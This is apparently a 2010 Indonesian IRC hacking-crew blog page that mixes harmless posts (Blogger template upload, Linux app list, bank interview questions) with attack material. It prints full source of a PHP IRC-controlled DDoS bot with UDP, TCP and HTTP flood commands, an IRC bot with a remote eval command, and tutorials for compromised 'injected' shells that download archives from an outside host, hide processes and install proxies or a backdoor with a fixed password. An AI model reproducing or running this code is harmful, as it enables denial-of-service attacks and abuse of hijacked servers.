- Cross Fire v.1
- Cross Fire v.1.2
- CrossFire x edition
- CrossFire x.v 1.3
- deathFire v 1.4 double robo
- DeathwaR EvoLutioN V.1
- DeathwaR EvoLutioN kickmeter
- DeathwaR EvoLutioN v.2
- DeathwaR EvoLutioN v.2 (regex)
- DeathwaR EvoLutioN v.3 RPX (regex & posX)
- DeathwaR Evolution Revenge Socket [ALLnet] (RPX ultimate)
Mengenai Saya
Pengikut
Tips & Trik
Blog Archive
-
▼
2010
(15)
-
▼
Februari
(14)
-
►
Feb 02
(12)
- How to upload Blogger templates
- php ddos bot
- simple bot guard mirc
- team deathwar@allnework
- 10 Aplikasi Linux
- MENDETEKSI LOGIN SSH
- Tutorial proxy dari shell | Socks 5 Dari Shell Inj...
- Script psyBNC
- Tutorial BOT eggdrop
- Cara Menambah TCL
- CARA BIKIN RADIO ONLINE DI JOOMLA ANDA
- contoh pertanyaan khusus wawancara
-
►
Feb 02
(12)
-
▼
Februari
(14)
Senin, 15 Februari 2010
Script DeathwaR@allnetwork 2009
Selasa, 02 Februari 2010
How to upload Blogger templates
- Download your Blogger XML template from BTemplates.com. The template is contained in a zip file (winzip, winrar), ensure you have extracted the XML template.
- Log in to your Blogger dashboard and go to Layout > Edit HTML
- Ensure you back up your old template in case you decide to use it again. To do this, click on the "download full template" link and save the file to your hard drive.
- Look for the section near the top where you can browse for your XML template:
- Enter the location of your template and press "upload".
- The HTML of your new template will now appear in the box below. You can preview your template or simply save to start using it!
- Enjoy!
Templates/Layouts in http://btemplates.com
php ddos bot
/*
PHP DDoS Bot
Version 1.0
[www.~censored~.org]
*/
$server="1.3.3.7";
$Port="6667";
$nick="bot-";$willekeurig;
$willekeurig=mt_rand(0,3);
$nicknummer=mt_rand(100000,999999);
$Channel="#WauShare";
$Channelpass="ddos";
$msg="Farewell.";
set_time_limit(0);
$loop = 0; $verbonden = 0;
$verbinden = fsockopen($server, $Port);
while ($read = fgets($verbinden,512)) {
$read = str_replace("\n","",$read); $read = str_replace("\r","",$read);
$read2 = explode(" ",$read);
if ($loop == 0) {
fputs($verbinden,"nick $nick$nicknummer\n\n");
fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
}
if ($read2[0] == "PING") { fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n"); }
if ($read2[1] == 251) {
fputs($verbinden,"join $Channel $Channelpass\n");
$verbonden++;
}
if (eregi("bot-op",$read)) {
fputs($verbinden,"mode $Channel +o $read2[4]\n");
}
if (eregi("bot-deop",$read)) {
fputs($verbinden,"mode $Channel -o $read2[4]\n");
}
if (eregi("bot-quit",$read)) {
fputs($verbinden,"quit :$msg\n\n");
break;
}
if (eregi("bot-join",$read)) {
fputs($verbinden,"join $read2[4]\n");
}
if (eregi("bot-part",$read)) {
fputs($verbinden,"part $read2[4]\n");
}
if (eregi("ddos-udp",$read)) {
fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
$fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
if (!$fp)
{
//echo "$errstr ($errno)
\n"; //troep
exit;
}
else
{
$char = "a";
for($a = 0; $a < 9999999999999; $a++)
$data = $data.$char;
if(fputs ($fp, $data) )
fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
else
fputs($verbinden,"privmsg $Channel :udp-ddos -
}
}
if (eregi("ddos-tcp",$read)) {
fputs($verbinden,"part $read2[4]\n");
fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
$server = $read2[4];
$Port = $read2[5];
for($sockets = 0; $sockets < $read2[6]; $sockets++)
{
$verbinden = fsockopen($server, $Port);
}
}
if (eregi("ddos-http",$read)) {
fputs($verbinden,"part $read2[4]\n");
fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n");
$Webserver = $read2[4];
$Port = $read2[5];
$Aanvraag = "GET / HTTP/1.1\r\n";
$Aanvraag .= "Accept: */*\r\n";
$Aanvraag .= "Accept-Language: nl\r\n";
$Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
$Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
$Aanvraag .= "Host: $read2[4]\r\n";
$Aanvraag .= "Connection: Keep-Alive\r\n\r\n";
for($Aantal = 0; $Aantal < $read2[6]; $Aantal++)
{
$DoS = fsockopen($Webserver, $Port);
fwrite($DoS, $Aanvraag);
fclose($DoS);
}
}
$loop++;
}
?>
simple bot guard mirc
use strict();
use warnings();
use IO::Socket;
#default Options
my $network = "irc.freenodel.org"; #Network to connect to
my @channels = ("#trea"); #Channels to join in
my $op = "bla.vhost.at"; #Admin Vhost
my $nick = "aBot"; #Nick bot uses
my $user = "abot \"localhost\" \"".$network."\" :aBot"; #Username
my $chancount = 0; #How much channels are default ?!
sub send_pong;
sub join_chans;
sub parse_cmds;
sub do_command;
sub send_raw;
my $socket = IO::Socket::INET->new
(PeerAddr => $network,
PeerPort => 6667,
Proto => "tcp",
Type => SOCK_STREAM) or die("Can't Connect");
send_raw ("user $user\n");
send_raw ("nick $nick\n");
while(<$socket>) {
parse_cmds($_);
if($_ =~ '376')
{
print "[!] End of MOTD reached\n";
print "[!] Joining Channels\n";
join_chans($_);
}
}
close($socket);
sub do_command{
($name_, $to_, $host_, $cmd_) = @_;
if($cmd_ =~ /^!help/){
send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." :#User Commands\n");
send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." : !help - shows help menu\n");
send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." : !chancount - shows how much channels needs me\n");
send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." : !chanlist - shows in wich channels im\n");
send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." : !sqrt - prints the root of the given number;example: 9 is 3\n");
}
if($cmd_ =~ /^!sqrt (\d*)/){
$root = $1;
send_raw("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." :".$root." is ".sqrt($root)."\n");
}
if($cmd_ =~ /^!chancount/){
send_raw("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." :im in $chancount Channel(s)\n");
send_raw("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." :write !chanlist if you want to see in wich channels im\n");
}
if($cmd_ =~ /^!chanlist/){
send_raw("PRIVMSG ".$name_." :im in:\n");
foreach $chanl (@channels){
send_raw("PRIVMSG ".$name_." :".$chanl.", \n");
}
}
if($host_ eq $op){
if($cmd_ =~ /^!help/){
send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." :#Adminstrative Commands\n");
send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." : !kick
send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." : !kickban
send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." : !op <+/->
send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." : !voice <+/->
send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." : !chanmode
}
if($cmd_ =~ /^!chanmode (.*)/ ){
$mode = $1;
send_raw("MODE $to_ $mode\n");
}
if($cmd_ =~ /^!voice (.+?) (.+?) \:(.*)/){
$chan = $2;
$who = $3;
$mode = $1;
if($chan !~ /^#(.*)/){
send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." :arg1 is no channel\n");
return;
}
if($mode eq "+"){
send_raw("MODE ".$chan." +v ".$who."\n");
}
elsif($mode eq "-"){
send_raw("MODE ".$chan." -v ".$who."\n");
}
}
if($cmd_ =~ /^!op (.+?) (.+?) \:(.*)/){
$chan = $2;
$who = $3;
$mode = $1;
if($chan !~ /#(.*)/){
send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." :arg1 is no channel\n");
return;
}
if($mode eq "+"){
send_raw("MODE ".$chan." +o ".$who."\n");
}
elsif($mode eq "-"){
send_raw("MODE ".$chan." -o ".$who."\n");
}
}
if($cmd_ =~ /^!eval (.*)/){
eval $1;
}
if($cmd_ =~ /^!join (.*)/){
if($1 !~ /#(.*)/){
send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." :arg1 is no channel\n");
return;
}
else {
$channels[$chancount] = "#".$1;
print "[!] Joining Channel: ".$channels[$chancount]."\n";
send_raw ("JOIN ".$channels[$chancount]."\n");
$chancount++;
}
}
if($cmd_ =~ /!kick (.*) (.*)/){
$kchan = $1;
$knick = $2;
if($1 !~ /#(.*)/){
send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." :arg1 is no channel\n");
return;
}
else{
send_raw("KICK $kchan $knick\n");
}
}
if($cmd_ =~ /^!kickban (.*) (.*)/){
$kchan = $1;
$knick = $2;
if($1 !~ /#(.*)/){
send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." :arg1 is no channel\n");
return;
}
else{
send_raw("MODE ".$kchan." +b ".$knick."\n");
send_raw("KICK $kchan $knick\n");
}
}
}
}
sub parse_cmds{
$cmds = shift;
if($cmds =~ /^PING/){
send_pong($_);
}
elsif ($cmds =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/){
my $name=$1; my $host=$3; my $from=$4; my $args=$5;
if ($args =~ /^VERSION$/) {
send_raw ("PRIVMSG ".$name." :Dont disturb me!\n");
}
if($args =~ /^\!(.*)/)
{
do_command($name, $from, $host, $args);
}
}
}
sub join_chans{
foreach $jchan (@channels){
send_raw("join $jchan\n");
$chancount++;
printf "[!] Joining Channel: ".$jchan."\n";
}
}
sub send_raw{
my $tosend = shift;
print $socket "$tosend";
}
sub send_pong{
$pong = shift;
if($pong =~ /^PING (.*)/){
send_raw("PONG $1");
}
}
team deathwar@allnework
berikut nama-nama para warrior deathwar@allnetwork :
1. DeathwaR (Founder)
2. KLEPON (senior Knight)
3. Shadows (knight)
4. Bergundal (knight)
5. co_bios (knight)
6. KiddieS (knight)
7. rox_rock (knight)
8. sotengboy (knight)
9. given (knight)
10. Rizki (knight)
11. Ryan_BojzZ (knight)
Walaupun koneksi gak mendukung tetapi semangat para warrior tetap tinggi..viva deathwar..
tunjukkan kreativitasmu..
10 Aplikasi Linux
Bagi anda pengguna sistem operasi linux, disini ada. Aplikasi-aplikasi dibawah ini kebanyakan merupakan aplikasi yang Open Source dan bisa anda download secara gratis.
1. OpenOffice
OpenOffice adalah produk multi-platform untuk perkantoran.
Didalamnya terdapat aplikasi desktop seperti pengolah kata, spreadsheet, presentasi manajer, dan program gambar dengan antarmuka pengguna dan fitur lainnya yang mirip dengan program perkantoran yang lain.
Download OpenOffice
http://openoffice.mirrors.tds.net/pub/openoffice/stable/3.0.1/
2. Calm Antivirus
Clam AntiVirus adalah aplikasi open source (GPL) anti-virus toolkit untuk UNIX yang dirancang untuk e-mail pada pemindaian mail gateways.
Clam AntiVirus memberikan sejumlah utilitas termasuk yang fleksibel, scalable multi-threaded daemon, a command line scanner dan dapat melakukan update database secara otomatis.
Download ClamAV
http://www.clamav.net/download/
3. FileZilla
Filezilla merupakan solusi aplikasi gratis untuk FTP.
Filezilla klien adalah aplikasi yang cepat dan handal untuk lintas-platform FTP, FTPS dan SFTP client dengan banyak fitur bermanfaat dengan intuitif grafis antarmuka pengguna.
Download FileZilla
http://filezilla-project.org/download.php?type=client
4. gZIP
gzip (GNU zip) adalah utilitas untuk kompresi.
Keuntungan gZIP adalah kompresi yang lebih baik dan bebas dari paten algoritma.
Alat ini telah diadopsi oleh proyek GNU dan sekarang cukup populer di Internet.
Download gzi
http://www.gzip.org/
5. PuTTy
Putty merupakan aplikasi implementasi gratis untuk Telnet dan SSH.
Putty dapat digunakan di sistem operasi Win32 dan platform Unix.
Download Putty
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
6. OpenSSH
OpenSSH adalah sebuah versi GRATIS dari alat konektivitas SSH.
Pengguna telnet, rlogin, dan ftp mungkin tidak menyadari bahwa password mereka ditularkan di Internet tanpa enkripsi.
Tetapi OpenSSH melakukan encrypts semua lalu lintas (termasuk password) secara efektif untuk menghindari eavesdropping, pembajakan koneksi dan serangan lainnya.
Sebagai tambahan, OpenSSH menyediakan kemampuan tunneling secara aman dan beberapa metode otentikasi, dan mendukung semua versi SSH protokol.
Download OpenSSH
http://www.openssh.org/portable.html
7. Conky
Conky adalah aplikasi gratis, Conky dapat menampilkan informasi apapun di komputer Anda.
Fasiltas Conky antara lain :
* Menampilkan info statistik seperti :
uname, uptime, penggunaan CPU, penggunaan mempry, penggunaan harddisk, proses statistik dan memantau jaringan.
* Mendukung POP3 dan IMAP.
* Mendukung banyak sekali pemutar musik seperti MPD, XMMS2, BMPx, audacious dan lebih banyak lagi.
Conky dapat menampilkan informasi baik sebagai teks, proses yang sederhana dan grafik widget dengan warna dan font yang berbeda.
Download Conky
http://sourceforge.net/project/showfiles.php?group_id=143975&package_id=158249
8. TrueCrypt
TrueCrypt merupakan aplikasi encryption yang open source untuk Windows Vista / XP, Mac OS X, dan Linux
Kegunaan TrueCrypt antara lain :
* Membuat virtual disk yang dienkripsi dalam file dan mounts sebagai real disk.
* Melakukan Enkripsi partisi atau perangkat penyimpanan seperti USB flash drive dan hard drive.
* Melakukan Enkripsi partisi atau drive di mana Windows terinstal (pre-boot otentikasi).
* Melakukan Enkripsi secara otomatis, real-time (on-the-fly) dan transparan.
* Memberikan tingkat dua masuk akal deniability, jika sebuah pasukan musuh yang mengungkapkan password:
* Menggunakan algoritma: AES-256, Serpent, aTwofish dan Modus operasi: XTS.
Download TrueCrypt
http://www.truecrypt.org/downloads.php
9. FireStarter
Firestarter adalah Real Time Firewall yang memonitor semua port yang terbuka dan aktif pada koneksi jaringan di komputer Anda.
Memungkinkan Anda untuk menetapkan aturan yang sangat ketat ditetapkan.
Fitur utama termasuk
* Open Source dan tersedia secara gratis.
* Mudah untuk menggunakan dengan antarmuka grafis.
* Cocok untuk digunakan di desktop, server dan gateways.
* Memungkinkan Anda untuk mengatur inbound dan outbound sesuai aturan.
* Dapat melihat aktifitas jaringan termasuk lalu lintas melalui firewall.
Download FireStarter
http://www.fs-security.com/download.php
10. GParted
GParted adalah aplikasi Gnome Partition Editor.
GParted adalah aplikasi untuk menciptakan, menghapus, mengganti ukuran, memindahkan, memeriksa, menyalin partisi dan file sistem.
GParted dapat membuat ruang untuk sistem operasi baru , pengaturan ulang penggunaan disk, menyalin data yang berada pada hard disk dan partisi mirroring satu dengan lainnya.
Download Gparted
http://gparted.sourceforge.net/download.php
MENDETEKSI LOGIN SSH
Author : KillFinger
Editor : venand
Press : ISD Indohack Security Development
C : 2009
#########################
Just read n no comment ...
1. Login dengan magic passwd:
[kill@localhost project]$ ssh -l deMilo localhost
deMilo@localhost's password:
Last login: Thu Oct 15 11:51:04 2003 from localhost
[root@localhost deMilo]#
2. Perhatikan baik2 bagian ini:
[root@localhost deMilo]# ps awux
root 10320 0.0 0.5 2960 1352 ? S 11:46 0:00 /usr/sbin/sshd
kill 11507 1.1 4.3 53120 11052 ? S 13:01 0:01 xmms
kill 11557 0.1 0.5 2984 1476 pts/1 S 13:02 0:00 ssh -l deMilo localhost
root 11558 0.0 0.5 5556 1536 ? S 13:02 0:00 sshd: deMilo [priv]
root 11561 0.0 0.6 5644 1644 ? S 13:02 0:00 sshd:
root 11879 0.4 0.5 2600 1512 pts/2 S 13:19 0:00 -bash
kill 12206 2.2 0.5 2976 1468 pts/3 S 13:31 0:00 ssh -l john localhost
root 12207 0.6 0.6 5556 1556 ? S 13:31 0:00 sshd: john [priv]
john 12209 0.0 0.6 5644 1656 ? S 13:31 0:00 [sshd]
john 12212 2.6 0.5 2600 1512 pts/5 S 13:31 0:00 -bash
kill 12722 0.0 0.5 2976 1468 pts/4 S 14:09 0:00 ssh -l root localhost
root 12723 0.0 0.6 5564 1580 ? S 14:09 0:00 sshd: root@pts/6
root 12728 0.0 0.5 2604 1516 pts/6 S 14:09 0:00 -bash
Penjelasan bagian atas;
-- Seorang user login dengan login_name "deMilo" menggunakan magic passwd, otomatis akan menjadi root:
root 11558 0.0 0.5 5556 1536 ? S 13:02 0:00 sshd: deMilo [priv]
root 11561 0.0 0.6 5644 1644 ? S 13:02 0:00 sshd:
root 11879 0.4 0.5 2600 1512 pts/2 S 13:19 0:00 -bash
-- Seorang user login dengan login_name "john" menggunakan passwd nya sendiri (valid passwd):
root 12207 0.6 0.6 5556 1556 ? S 13:31 0:00 sshd: john [priv]
john 12209 0.0 0.6 5644 1656 ? S 13:31 0:00 [sshd]
john 12212 2.6 0.5 2600 1512 pts/5 S 13:31 0:00 -bash
-- sytem sshd anda telah di infeksikan magic-passwd apabila tiap user yang login nampak bagian sbb:
root 11558 0.0 0.5 5556 1536 ? S 13:02 0:00 sshd: login_name [priv]
root 11561 0.0 0.6 5644 1644 ? S 13:02 0:00 sshd:
-- system yang normal (tidak terinfeksi):
root 12207 0.0 0.5 5556 1536 ? S 13:31 0:00 /usr/sbin/sshd
john 12209 0.0 0.6 5644 1656 ? S 13:31 0:00 [sshd]
<-- dengan tanda kurung apabila user
-- apabila root yang login dengan valid passwd:
root 12723 0.0 0.6 5564 1580 ? S 14:09 0:00 sshd: root@pts/6 <-- root dgn valid passwd akan tampak begini
root 12728 0.0 0.5 2604 1516 pts/6 S 14:09 0:00 -bash
3. Login dengan login_name "apache" menggunakan magic passwd:
[kill@localhost project]$ ssh -l apache localhost
apache@localhost's password:
-sh-2.05b# id
uid=0(root) gid=0(root) groups=0(root)
-sh-2.05b# pwd
/var/www
-sh-2.05b#
4. Terlihat tanda2nya:
[kill@localhost project]$ ps awux
kill 11861 1.2 4.1 53248 10720 ? S 13:18 0:01 xmms
kill 11931 0.5 0.5 2984 1476 pts/4 S 13:20 0:00 ssh -l apache localhost
root 11932 0.0 0.5 5556 1536 ? S 13:20 0:00 sshd: apache [priv]
root 11934 0.0 0.6 5644 1644 ? S 13:20 0:00 sshd:
root 11937 0.2 0.5 2600 1516 pts/2 S 13:20 0:00 -sh
kill 11967 0.0 0.2 2580 760 pts/1 R 13:20 0:00 ps awux
Kesimpulan:
Semua valid passwd yang login di log di suatu tempat apabila ada "sshd:". Atau dengan kata lain, apabila anda menemukan "sshd:" di command "ps awux" artinya system anda telah terinfeksi "magic_passwd". ExpLorE y0uR 0wN sYstEm. B-Creative!!!!
5. Penutup
Keep this Open-Source spirit up. This system is aLL about binary, if you are NOT 1 then you are 0. Knowledge is belong to the world, share it. Kritik, saran dan caci maki silahkan kirim ke KillFinger@linuxmail.org.
Online BUddiEs:
A_BlAcK_LisT, Acetosal, jhon angga, ryan_the, ucoxxx, AcCezZdENieD dan KIDS_KIDS. Special buat teman2 yang tidak bisa disebutkan satu persatu di #SecretColony, #HackingCentre, #Level9-Team @t DAL.Net.
Offline d00d:
t0t0 at jasakom (kapan nge-band lagi?), erich, d0nny, edd0, din0 at SecretColony Labs n Research Group, /bsp/mnt, y0gas.
Salam hangat buat crew #IndoHack, #Neoteker, #IndoLinux. <-- OpenSource Team
-----------------------
To follow the path;
look to the master,
follow the master,
walk with the master,
see through the master,
become the master.
-----------------------
Hacking is NOT instant.
Best Regs
Tutorial proxy dari shell | Socks 5 Dari Shell Injekan | akses putty dari shell Injekan
-
1. wget / lwp-download / fetch http://venand.fileave.com/data/vie.tgz
2. tar zxf vie.tgz
3. cd pro
4. ./xh -s "/usr/sbin/httpd"
5. ./prox -a -d -p(4567) <-- port
Setelah selesai, coba join ke #vip [Linknet] #Death [Allnet]
lalu test portcheck.. example !port (nomerIP) (port)
-
-----------
-
Cara Bikin Socks 5 Dari Shell Injekan :
1. wget / lwp-download / fetch http://venand.fileave.com/data/socks.tgz
2. tar -zxvf socks.tgz
3. cd .setan
4. ./xh -s [ngentot-root-ya] ./httpd start
-
Setelah selesai, coba join ke #vip [Linknet] #Death [Allnet]
lalu test portcheck.. example !port (nomerIP) 6543
-
-------------------
-
Cara memperoleh login akses putty dari shell Injekan :
1. wget / lwp-download / fetch http://venand.fileave.com/data/blind.tar.gz
2. tar -zvxf blind.tar.gz
3. rm -fr blind.tar.gz
4. ./blind
-
Setelah selesai, coba join ke #vip [Linknet] #Death [Allnet]
lalu test portcheck.. example !port (nomerIP) 1953
Kalau accepted, berarti sudah bisa login lewat putty (Telnet) dengan password : samboda
-
-
-
#===============================
[i] Semoga yang saya tulis bermanfaat
#===============================
Script psyBNC
apa yang saya sampaikan ini hanya sekedar buat pengetahuan|belajar
dan tidak ada maksud lebih, jadi jika apa yang saya tulis merugikan
beberapa pihak, saya selaku FO|owner mafia-cyber, saya mohon maaf.
jika ternyata kakak jauh lebih tau tentang artikel saya ini, saya
mohon bimbingannya :D
thanks alL [+]
#======================
# [*] Tahap persiapan #
#======================
[+]beberapa perlengkapan
-
[1] Shell | VPS
[2] Software Putty <<<<< untuk mempercepat pembuatan eggdrop|psyBNC
[3] Software winscp <<<< untuk mempermudah edit data pada Shell | VPS
[4] Software IZArc <<<<< untuk Exract data
-
#=======================
# [*] psyBNC chapture #2
#=======================
-
[+] Memasukan Script pada psyBNC
-
[1] buka folder psybnc
[.] cd psybnc <--- tergantung nama folder nya
[.] rm -fr scripts
[2] wget http://venand.fileave.com/data/scripts.tar.gz
[3] tar -zxvf scripts.tar.gz
[3] ls [ pastikan ada data DEFAULT.SCRIPT ]
[4] login psyBNC kamu dan ketik /sreload
-
[=] psyBNC + script sudah jadi, mudah y :D
----------------------------------------------------
-
[+] cara edit script psyBNC
-
[0] buka sofware winscp yang sudah terinstal dan lakukan login
-
[01] cari folder psyBNC kamu
[02] buka folder scripts dan kamu akan menemukan DEFAULT.SCRIPT
[03] klik kanan dan klik edit
[04] disitu anda akan disuguhkan tulisan yang bikin puyeng hehehe
[05] klik aja di bagian atas ada edit | replace
[06] pada Find what ketik : venand!*@*
[07] pada replace with ketik : nickkamu!*@* [ ex : master!*@* ]
[08] klik save n close edit
[09] buka psyBNC kamu dan ketik /sreload
[10] ketik di channel .auth <---- jika ada respon|jawaban berarti anda telah berhasil
[11] ketik .help <--- untuk mengetahui commands nya
-
[=] Pengeditan script telah selesai, cukup mudah kan :D
-----------------------------------------------------
-
[x] to be continue..........
-
-
-
-
-
-
-
#===================================================
[i] Semoga yang saya tulis bermanfaat
#===================================================
Tutorial BOT eggdrop
# [*] BOT eggdrop
#=============
-
[0] buka software putty dan lakukan login
-
[1] wget http://venand.fileave.com/data/tian.tar.gz
[2] tar -zxvf tian.tar.gz
[3] rm -fr tian.tar.gz
[4] cd tian
[5] /sbin/ifconfig
[6] ./nadya a.txt [nickbot] [ident] [ip-shel] [chan-#] [owner]
[7] ./eggdrop -m a.txt
[8] ./dssl a.txt
-
[0] buka mirc kamu dan join di /server irc.hell.at 6667 [linknet]
[0] ketik /msg [nick bot] hello
[0] bot akan join otomatis di #channel anda
[0] ketik /msg [nick bot] pass [password]
[0] ketik /msg [nick bot] auth [password]
[0] kamu akan mendapat pesan !OWNER
-
[=] bot eggdrop anda sudah jadi, mudah kan :D
---------------------------------------------------
[note] bot ini akan join di server irc.hell.at 6667
---------------------------------------------------
-
-
-
[x] to be continue..........
-
-
[+] Link boteggdrop yang lain
-
- http://venand.fileave.com/data/b0t.tar.gz == [ server datnet ]
- http://venand.fileave.com/data/dal.tar.gz == [ server datnet ]
- http://venand.fileave.com/data/tian.tar.gz == [ server Link-Net ]
- http://venand.fileave.com/data/eggmbonx.tar.gz == [ server Allnetwork ]
-
-
#===============================
[i] Semoga yang saya tulis bermanfaat
#===============================
Cara Menambah TCL
# [*] Tahap persiapan #
#======================
-
[+]beberapa perlengkapan
-
[1] Shell | VPS
[2] Software Putty <<<<< untuk mempercepat pembuatan eggdrop|psyBNC
[3] Software winscp <<<< untuk mempermudah edit data pada Shell | VPS
[4] Software IZArc <<<<< untuk Exract data
-
-
#============================
# [*] BOT eggdrop chapture #2
#============================
-
[0] buka software putty dan lakukan login
-
[+] Menambahkan script tcl bot eggdrop
-
[1] buka folder bot eggdrop anda
[-] cd [nama folder] ex. cd eggdrop << jika folder eggdrop
[-] cd scripts
[2] wget http://.........
[3] cd ..
[4] ./tcl -[t] Nama_Config_File [Nama_File_tcl]
[-] contoh ./tcl -t death.conf zodiak.tcl << jika yang anda masukan zodiak.tcl
[5] anda masuk mirc dan ketik /msg [nickbot] rehash
[-] tunggu beberapa saat
[6] ketik di #channel perintah yang ada pada tcl yang anda masukan
[-] !zodiak << jika yang anda masukan adalah zodiak.tcl
-
[=] edit bot eggdrop anda sudah jadi, mudah kan :D
---------------------------------------------------
[x] to be continue..........................
#====================================
[i] Semoga yang saya tulis bermanfaat
#====================================
CARA BIKIN RADIO ONLINE DI JOOMLA ANDA
Saya hanya ingin share bagaimana cara membuat situs joomla anda dilengkapi dengan radio streaming sendiri.. Radio streming ini dijalankan melalui sebuah server hosting gratis dan memerlukan winamp sebagai audio input untuk streming anda..
Langsung aja ke step -stepnya..
contoh pertanyaan khusus wawancara
Pertanyaan Khusus dalam Wawancara
Kelompok Bidang Perbankan
- Ceritakan, apa yang dimaksud dengan bank ?
- Sebutkan dan jelaskan produk-produk perbankan yang anda ketahui.
- Jelaskan perbedaan deposito dengan tabungan.
- Apakah yang anda ketahui tentang marketing secara umum ? Dan marketing khusus untuk perbankan ?
- Seandainya anda menjadi seorang petugas marketing, bagaimana cara anda mencari nasabah ?
- Syarat-syarat apa saja yang ditetapkan oleh bank untuk mendapatkan pinjaman ?
- Untuk memperkecil resiko kredit, maka permohonan kredit harus dinilai oleh bank. Jelaskan yang dimaksud dengan 5 C ?
- Jelaskan apa yang dimaksud dengan f.e.o., dan gadai ?
- Sebutkan dan jelaskan tugas-tugas CS (Costumer Sevice) secara umum. Dan tugas-tugas CS di perbankan.
- Bagaimana menurut anda sikap Costumer Sevice yang baik ?
- Bagaimana sikap anda jika menghadapi nasabah yang banyak menuntut ?
- Bagaimana sikap anda bila ada nasabah yang ingin menutup rekeningnya, padahal nasabah tersebut merupakan prime customer ?
- Hal-hal apa saja menurut anda yang perlu dirahasiakan terhadap sesama karyawan maupun pihak lain ?
- Sebutkan syarat-syarat untuk pembukaan rekening perorangan. Kemudian sebutkan untuk rekening perusahaan.
- Bagaimana sikap anda saat atasan menegur anda ?
- Sebutkan dan jelaskan tugas-tugas Teller.
- Bagaimana menurut anda sikap Teller yang baik ?
- Jelaskan perbedaan cek dengan BG.
- Jelaskan ciri-ciri uang palsu.
- Sebutkan dan jelaskan perbedaan bank umum dengan bank perkreditan rakyat.
- Jelaskan mengenai kliring.
- Jelaskan perbedaan cek dengan BG.
- Hal-hal apa saja menurut anda yang perlu dirahasiakan terhadap sesama karyawan maupun pihak lain ?
- Seandainya anda menjadi pimpinan, ceritakan hal-hal apa saja yang anda lakukan bila ada karyawan baru yang menjadi bawahan anda.
- Seandainya anda menjadi pimpinan, jelaskan apa yang akan anda lakukan jika bawahan anda malas dan tidak efisien.
- Seandainya anda menjadi pimpinan, ceritakan tindakan-tindakan apa yang anda lakukan dalam membimbing, mengarahkan, dan memotivasi bawahan anda.
- Seandainya anda menjadi pimpinan, bagaimana sikap anda bila ada bawahan yang sering terlambat ?
Senin, 01 Februari 2010
Script War MIRC
Script War MIRC antara lain:
1. Ashifa4. GeraNdonK
5. Maulana
6. Konoha7. Anaconda
9. Preman SHift
10. Preman V22
11. Preman V28
12. X-FORCE
13. Unnamed
14. Kurcaci
15. Mangkok
16. Armagedon socket
17. Cakra
18. BejatwaR V1.0